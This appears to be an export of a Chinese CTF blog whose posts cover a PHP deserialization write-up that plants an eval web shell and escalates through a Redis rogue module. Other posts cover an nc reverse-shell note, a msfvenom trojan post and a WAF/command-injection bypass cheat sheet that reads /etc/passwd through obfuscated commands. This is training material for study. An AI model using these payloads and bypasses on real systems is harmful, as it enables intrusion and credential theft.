<span class="hljs-variable language_">self</span>.target_port))<br> proxy_socket.sendall(request_data)<br><br> response_data = <span class="hljs-string">b""</span><br> <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br> chunk = proxy_socket.recv(<span class="hljs-number">4096</span>)<br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> chunk:<br> <span class="hljs-keyword">break</span><br> response_data += chunk<br><br> header_end = response_data.rfind(<span class="hljs-string">b"\r\n\r\n"</span>)<br> <span class="hljs-keyword">if</span> header_end != -<span class="hljs-number">1</span>:<br> body = response_data[header_end + <span class="hljs-number">4</span>:]<br> <span class="hljs-keyword">else</span>:<br> body = response_data<br> <br> response_body = body<br> response = <span class="hljs-string">b"HTTP/1.1 200 OK\r\n"</span> \<br> <span class="hljs-string">b"Content-Length: "</span> + <span class="hljs-built_in">str</span>(<span class="hljs-built_in">len</span>(response_body)).encode() + <span class="hljs-string">b"\r\n"</span> \<br> <span class="hljs-string">b"Content-Type: text/html; charset=utf-8\r\n"</span> \<br> <span class="hljs-string">b"\r\n"</span> + response_body<br><br> client_socket.sendall(response)<br> <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Proxy Error: <span class="hljs-subst">{e}</span>"</span>)<br> <span class="hljs-keyword">finally</span>:<br> client_socket.close()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">start_proxy_server</span>(<span class="hljs-params">host, port, target_host, target_port</span>):<br> proxy_handler = HTTPProxyHandler(target_host, target_port)<br> server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br> server_socket.bind((host, port))<br> server_socket.listen(<span class="hljs-number">100</span>)<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Proxy server is running on <span class="hljs-subst">{host}</span>:<span class="hljs-subst">{port}</span> and forwarding to <span class="hljs-subst">{target_host}</span>:<span class="hljs-subst">{target_port}</span>..."</span>)<br><br> <span class="hljs-keyword">try</span>:<br> <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br> client_socket, addr = server_socket.accept()<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Connection from <span class="hljs-subst">{addr}</span>"</span>)<br> thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))<br> thread.daemon = <span class="hljs-literal">True</span><br> thread.start()<br> <span class="hljs-keyword">except</span> KeyboardInterrupt:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Shutting down proxy server..."</span>)<br> <span class="hljs-keyword">finally</span>:<br> server_socket.close()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">run_flask_app</span>():<br> app.run(debug=<span class="hljs-literal">False</span>, host=<span class="hljs-string">'127.0.0.1'</span>, port=<span class="hljs-number">5000</span>)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">"__main__"</span>:<br> proxy_host = <span class="hljs-string">"0.0.0.0"</span><br> proxy_port = <span class="hljs-number">5001</span><br> target_host = <span class="hljs-string">"127.0.0.1"</span><br> target_port = <span class="hljs-number">5000</span><br><br> <span class="hljs-comment"># 安全反代,防止针对响应头的攻击</span><br> proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))<br> proxy_thread.daemon = <span class="hljs-literal">True</span><br> proxy_thread.start()<br><br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Starting Flask app..."</span>)<br> run_flask_app()<br><br><br><br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>bypass</title>
<link href="/2025/01/09/bypass/"/>
<url>/2025/01/09/bypass/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>在长城杯上偶遇未知bypass,拼劲全力无法战胜,特此来修炼</p><h2 id="天翼杯-2021-esay-eval"><a href="#天翼杯-2021-esay-eval" class="headerlink" title="[天翼杯 2021]esay_eval"></a><a href="https://www.nssctf.cn/problem/364">[天翼杯 2021]esay_eval</a></h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">A</span></span>{<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$code</span> = <span class="hljs-string">""</span>;<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$method</span>,<span class="hljs-variable">$args</span></span>)</span>{<br> <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>->code);<br> <br> }<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->code = <span class="hljs-string">""</span>;<br> }<br>}<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">B</span></span>{<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>->a-><span class="hljs-title function_ invoke__">a</span>();<br> }<br>}<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>])){<br> <span class="hljs-title function_ invoke__">preg_match_all</span>(<span class="hljs-string">'/"[BA]":(.*?):/s'</span>,<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>],<span class="hljs-variable">$ret</span>);<br> <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$ret</span>[<span class="hljs-number">1</span>])) {<br> <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$ret</span>[<span class="hljs-number">1</span>] <span class="hljs-keyword">as</span> <span class="hljs-variable">$i</span>) {<br> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$i</span>)!==<span class="hljs-number">1</span>){<br> <span class="hljs-keyword">exit</span>(<span class="hljs-string">"you want to bypass wakeup ? no !"</span>);<br> }<br> }<br> <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>]); <br> }<br><br><br>}<span class="hljs-keyword">else</span>{<br> <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>} <br></code></pre></td></tr></table></figure><p>首先会对传入的参数做一个正则匹配,匹配A类和B类名字后面的数目,要求必须为1,而我们要绕过<br>wakeup需要大于1,这里利用php对类名大小写不敏感的特性去绕过,payload</p><p>so easy 的一个反序列化,要注意一个点,利用php对类名大小写不敏感的特性去绕过题目中的正则表达式,在构造payload的时候,将类名换为a,b;</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">a</span></span>{<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$code</span> = <span class="hljs-string">""</span>;<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>{<br><span class="hljs-comment">//$this->code="phpinfo();";</span><br> <span class="hljs-variable language_">$this</span>->code=<span class="hljs-string">"eval(\$_GET['pass']);"</span>;<span class="hljs-comment">//写个🐎进去</span><br>}<br><br>}<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">b</span></span>{<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->a=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">a</span>();<br> }<br>}<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">b</span>());<br><span class="hljs-comment"># 最后改一下b类属性的数量,让其不为1,触发wakeup魔术方法</span><br><span class="hljs-comment">#O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}</span><br><span class="hljs-comment">#改成O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}</span><br><br>O:<span class="hljs-number">1</span>:<span class="hljs-string">"b"</span>:<span class="hljs-number">2</span>:{s:<span class="hljs-number">1</span>:<span class="hljs-string">"a"</span>;O:<span class="hljs-number">1</span>:<span class="hljs-string">"a"</span>:<span class="hljs-number">1</span>:{s:<span class="hljs-number">4</span>:<span class="hljs-string">"code"</span>;s:<span class="hljs-number">21</span>:<span class="hljs-string">"eval(<span class="hljs-subst">$_POST</span>['pass']);"</span>;}}<br><br></code></pre></td></tr></table></figure><p>蚁剑连接<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091121732.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501091120750.png" srcset="/img/loading.gif" lazyload><br>发现权限不足,尝试使用蚁剑的插件,暴力绕过<br>disable_functions,Antsword插件<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091213124.png" srcset="/img/loading.gif" lazyload></p><p>同时发现这个是个swp文件,这是vim缓存泄露的文件,尝试恢复一下</p><blockquote><p>在开发人员使用 vim 编辑器 编辑文本时,系统会自动生成一个备份文件,当编辑完成后,保存时,原文件会更新,备份文件会被自动删除。<br>但是,当编辑操作意外终止时,这个备份文件就会保留,如果多次编辑文件都意外退出,备份文件并不会覆盖,而是以 swp、swo、swn 等其他格式,依次备份。</p></blockquote><p>利用vim来恢复 vim -r XXXX.php.swp<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091224047.png" srcset="/img/loading.gif" lazyload><br>在这里发现了REDIS的配置文件,尝试连接</p><p>这里要下载exp.so文件,并进行利用,简单解释一下exp.so文件</p><blockquote><p>Redis 中的 exp.so 文件通常被用作 Redis 提权的一种方式。这个文件是一个 Redis 模块,它可以在 Redis 服务器中执行任意代码。<br>Redis 模块是一种可插拔的扩展,它允许用户在 Redis 服务器中添加新的功能。exp.so 文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。<br>在 Redis 提权攻击中,攻击者通常会利用 Redis 的漏洞或者弱密码,获取 Redis 服务器的访问权限。一旦攻击者获得了访问权限,他们就可以上传 exp.so 文件到 Redis 服务器中,并使用 Redis 的 module load 命令加载这个文件。这个文件会在 Redis 服务器中执行任意代码,从而让攻击者获得服务器的控制权</p></blockquote><p>EXP.SO:<a href="https://github.com/Dliv3/redis-rogue-server">https://github.com/Dliv3/redis-rogue-server</a></p><p>然后用redis提权<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091255627.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501091256738.png" srcset="/img/loading.gif" lazyload><br>随便选择一个,执行命令,利用module load 命令加载这个文件,然后才能进行RCE,所以在虚拟命令行输入MODULE LOAD /var/www/html/exp.so<br>然后我们就可以进行命令执行了,即可查看flag<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091257489.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>nc监听端口和反弹shell</title>
<link href="/2025/01/05/nc%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%E5%92%8C%E5%8F%8D%E5%BC%B9shell/"/>
<url>/2025/01/05/nc%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%E5%92%8C%E5%8F%8D%E5%BC%B9shell/</url>
<content type="html"><![CDATA[<p>nc [-hlnruz] [-g<网关…>] [-G<指向器数目>] [-i<延迟秒数>] [-o<输出文件>] [-p<通信端口>] [-s<来源位址>] [-v…] [-w<超时秒数>] [主机名称] [通信端口…]</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052042662.png" srcset="/img/loading.gif" lazyload></p><p>注意再使用nc的-l时连接成功不会有明显的回显,但是这个时候可能已经连接上了<br><img src="https://gitee.com/fogpost/photo/raw/master/202501052046913.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501052047210.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>WEB</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>简单的远控木马啊</title>
<link href="/2025/01/05/%E7%AE%80%E5%8D%95%E7%9A%84%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%95%8A/"/>
<url>/2025/01/05/%E7%AE%80%E5%8D%95%E7%9A%84%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%95%8A/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>玩玩木马</p><h2 id="利用kali生成"><a href="#利用kali生成" class="headerlink" title="利用kali生成"></a>利用kali生成</h2><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052023460.png" srcset="/img/loading.gif" lazyload></p><p>参数含义:-p:payload 载荷 目标操作系统类型/系统位数/获取目标的控制权限/使靶机连接至攻击机 -f:format 文件格式 -o:output 输出文件</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052058694.png" srcset="/img/loading.gif" lazyload><br>配置攻击模块</p>]]></content>
<categories>
<category>渗透测试</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>webtest</title>
<link href="/2025/01/05/webtest/"/>
<url>/2025/01/05/webtest/</url>
<content type="html"><![CDATA[<h1 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h1><figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme">[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]][([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+([][[]]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+([][[]]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]((<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]])()<br></code></pre></td></tr></table></figure><p>这一段是alert(1),再开发者工具的console(控制台)中运行即可。</p>]]></content>
</entry>
<entry>
<title>day01</title>
<link href="/2025/01/02/day01/"/>
<url>/2025/01/02/day01/</url>
<content type="html"><![CDATA[<h1 id="新刊blog,堂堂连载"><a href="#新刊blog,堂堂连载" class="headerlink" title="新刊blog,堂堂连载"></a>新刊blog,堂堂连载</h1>]]></content>
</entry>
<entry>
<title>waf绕过总结</title>
<link href="/2024/12/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/"/>
<url>/2024/12/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h1 id="waf绕过总结"><a href="#waf绕过总结" class="headerlink" title="waf绕过总结"></a>waf绕过总结</h1><h2 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h2><p>在ping的过程中一些地方可以在后方利用;或者|直接进行命令执行,但这时便会遇到一些相关方面的waf也就是阻拦,我们需要绕过这些waf</p><h2 id="空格绕过:"><a href="#空格绕过:" class="headerlink" title="空格绕过:"></a>空格绕过:</h2><p>在bash下可以用$IFS、${IFS}、$IFS$9、%09、<、>、<>、{,}(例如{cat,/etc/passwd} )、%20(space)、%09(tab)</p><h2 id="命令执行函数system-绕过"><a href="#命令执行函数system-绕过" class="headerlink" title="命令执行函数system()绕过"></a>命令执行函数system()绕过</h2><p>系统命令函数system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反引号(·) 同shell_exec()用以上函数都可进行绕过。</p><h2 id="命令链接符:"><a href="#命令链接符:" class="headerlink" title="命令链接符:"></a>命令链接符:</h2><p>Windows和Linux都支持的命令连接符:<br>cmd1 | cmd2 只执行cmd2<br>cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行<br>cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2<br>cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2<br>Linux还支持分号(;),cmd1;cmd2 按顺序依次执行,先执行cmd1再执行cmd2 </p><h2 id="正则匹配绕过"><a href="#正则匹配绕过" class="headerlink" title="正则匹配绕过"></a>正则匹配绕过</h2><h3 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h3><p>普通的正则只会匹配一次,所以我们可以双写绕过。pphphp,只会过滤掉中间的php剩下来的部分可以组成第二个php,phpphpinfoinfo,同理。</p><h3 id="利用变量绕过"><a href="#利用变量绕过" class="headerlink" title="利用变量绕过"></a>利用变量绕过</h3><p>a=c;b=a;c=t;<br>$a$b$c /etc/passwd</p><h3 id="利用base编码绕过"><a href="#利用base编码绕过" class="headerlink" title="利用base编码绕过"></a>利用base编码绕过</h3><p>echo ‘cat’ | base64<br>Y2F0wqAK<br><code>echo 'Y2F0wqAK' | base64 -d</code> /etc/passwd<br>echo ‘Y2F0IC9ldGMvcGFzc3dk’ | base64 -d | bash // cat /etc/passwd </p><h3 id="利用hex编码绕过"><a href="#利用hex编码绕过" class="headerlink" title="利用hex编码绕过"></a>利用hex编码绕过</h3><p>echo “636174202F6574632F706173737764” | xxd -r -p|bash // hex编码后的0x不需要输入</p><h3 id="利用oct编码(八进制)绕过"><a href="#利用oct编码(八进制)绕过" class="headerlink" title="利用oct编码(八进制)绕过"></a>利用oct编码(八进制)绕过</h3><p>$(printf “\154\163”) //ls命令</p><h3 id="利用16进制编码绕过"><a href="#利用16进制编码绕过" class="headerlink" title="利用16进制编码绕过"></a>利用16进制编码绕过</h3><p>“\x73\x79\x73\x74\x65\x6d”(“cat /etc/passwd”)</p><h3 id="利用拼接绕过"><a href="#利用拼接绕过" class="headerlink" title="利用拼接绕过"></a>利用拼接绕过</h3><p>(sy.(st).em)(whoami);//<br>c’’a’’t /etc/passwd//单引<br>c””a””t /etc/passwd//双引<br>c<code>a</code>t /etc/passwd/反单引<br>c\a\t /etc/passwd//反斜线<br>$*和$@,$x(x 代表 1-9),${x}(x>=10) :<br>比如ca${21}t a.txt表示cat a.txt 在没有传入参数的情况下,这些特殊字符默认为空,如下:<br>wh$1oami<br>who$@ami<br>whoa$*mi<br>666<code>whoami</code>666 //bash: 666root666: command not found<br>666<code>\whoami</code>666 //bash: 666root666: command not found<br>//命令执行后的结果在2个666中间 </p><h3 id="插入注释"><a href="#插入注释" class="headerlink" title="插入注释"></a>插入注释</h3><p>(这对于绕过阻止特定PHP函数名称的WAF规则集很有用)<br>system/<em>A10ng_</em>/(whoami);<br>system/<em>A10ng_</em>/(wh./<em>A10ng_</em>/(oa)/<em>caixukun</em>/.mi);<br>(sy./<em>A10ng_</em>/(st)/<em>A10ng_</em>/.em)/<em>A10ng_</em>/(wh./<em>A10ng_</em>/(oa)/<em>A10ng_</em>/.mi);</p><h3 id="利用未初始化变量"><a href="#利用未初始化变量" class="headerlink" title="利用未初始化变量"></a>利用未初始化变量</h3><p>cat$u /etc/passwd<br>cat /etc$u/passwd</p><h3 id="过滤了斜杠’-‘"><a href="#过滤了斜杠’-‘" class="headerlink" title="过滤了斜杠’/‘"></a>过滤了斜杠’/‘</h3><p>可利用’;’拼接命令绕过<br>cd ..;cd ..;cd ..;cd ..;cd etc;cat passwd</p><h3 id="利用通配符绕过"><a href="#利用通配符绕过" class="headerlink" title="利用通配符绕过"></a>利用通配符绕过</h3><p>cat /passwd:<br>??? /e??/?a????</p><h3 id="利用path绕过"><a href="#利用path绕过" class="headerlink" title="利用path绕过"></a>利用path绕过</h3><p>可以通过截断和拼接来得到我们想要的来getshell<br>${PATH:5:1} //l<br>${PATH:2:1} //s<br>${PATH:5:1}${PATH:2:1} //拼接后是ls,执行命令<br>${PATH:5:1}s //拼接后是ls,执行命令 </p><h3 id="异或绕过"><a href="#异或绕过" class="headerlink" title="异或绕过"></a>异或绕过</h3><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">def</span> <span class="hljs-title function_">xor</span>():<br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">128</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">128</span>):<br> result=i^j<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(i)+<span class="hljs-string">' ^ '</span>+<span class="hljs-built_in">chr</span>(j)+<span class="hljs-string">' == > '</span>+<span class="hljs-built_in">chr</span>(result)+<span class="hljs-string">" ASCII:"</span>+<span class="hljs-built_in">str</span>(result))<br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">"__main__"</span>:<br> xor()<br></code></pre></td></tr></table></figure><p>(‘GGGGGGG’^’7/7.)!(‘)();<br>其中’G’^’7’=p,’G’^’/‘=h…………依次类推拼出你想得到的令。</p><h3 id="取反绕过"><a href="#取反绕过" class="headerlink" title="取反绕过"></a>取反绕过</h3><p>在这里存在一个取反的问题,原因是隐藏字母、可还原性、URL 编码与二进制兼容性<br>取反是一种隐蔽技术,它将敏感字符转换为难以识别的形式,有效规避检测。而不取反会直接暴露敏感字符或使其更容易被解码检测。结合 urlencode() 等方法,按位取反可以提升绕过复杂度并增强隐匿性</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-string">'phpinfo'</span>);<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>例如phpinfo()就是:<br>(~’%8F%97%8F%96%91%99%90’)();</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 